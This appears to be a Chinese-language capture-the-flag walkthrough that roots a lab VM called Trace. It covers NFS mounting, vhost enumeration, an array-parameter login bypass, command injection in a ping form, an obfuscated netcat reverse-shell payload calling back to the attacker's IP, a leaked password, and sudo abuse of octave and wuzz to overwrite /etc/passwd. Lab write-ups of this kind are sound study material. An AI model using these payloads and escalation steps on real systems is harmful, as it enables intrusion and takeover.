# 靶场搭建

下载:Trace

Nat,IP: 192.168.1.180

# 渗透过程

# 信息初收集

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp    open  http     Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      37577/tcp   mountd
|   100005  1,2,3      45651/udp6  mountd
|   100005  1,2,3      52567/tcp6  mountd
|   100005  1,2,3      59427/udp   mountd
|   100021  1,3,4      34220/udp   nlockmgr
|   100021  1,3,4      36633/tcp   nlockmgr
|   100021  1,3,4      37475/tcp6  nlockmgr
|   100021  1,3,4      40397/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs      3-4 (RPC #100003)
33623/tcp open  mountd   1-3 (RPC #100005)
34597/tcp open  mountd   1-3 (RPC #100005)
36633/tcp open  nlockmgr 1-4 (RPC #100021)
37577/tcp open  mountd   1-3 (RPC #100005)

有 NFS 系统,查一下

┌──(root㉿kali)-[~/Desktop]
└─# showmount -e 192.168.1.180
Export list for 192.168.1.180:
/var/www/html *

挂载: mount -t nfs 192.168.1.180:/var/www/html /tmp/gddfeng -nolock

www-data 用户进入 su -s /bin/bash www-data

查看 7828d2f51ceb3aefbd12aa383ec9d5e9/index.html 文件,拿到域名 staffserve.nyx

收集子域: gobuster vhost -u staffserve.nyx -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain , 拿到子域: admin3.staffserve.nyx

登录查看下数据包,POST 数组数据: login=admin&password[]=admin 拿到新的提示: networkteste.nyx

枚举一下子域: ping.networkteste.nyx ,访问发现是 RCE: curl 'http://ping.networkteste.nyx/' -X POST --data-raw 'pinger=127.0.0.1%7Cid&submitt=Ping'

弹 shell: curl 'http://ping.networkteste.nyx/' -X POST --data-raw 'pinger=127.0.0.1|bas\h -c "/usr/b?n/n[c] -e /\\b\i\n/////s\h 192.168.1.129 4444"&submitt=Ping'

查看 /var/www/site1/random.php 发现了密码: m3g4S3cuR3p4zzW0rd

www-data@trace:/var/www/site1$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
yan:x:1000:1000:yan,,,:/home/yan:/bin/bash
nel:x:1001:1001::/home/nel:/bin/bash

su 一下, yan 登录进去了

# 提权

sudo -u nel octave --eval 'system("/bin/sh")' 拿到 nel 的 shell

保存下 passwd 文件后修改一下 root 的密码,然后用 sudo wuzz 访问 web 服务中的 passwd 文件,然后覆盖掉目标机器上的 passwd。用预设的密码连上去就 OK 了

然后 su 过去直接拿下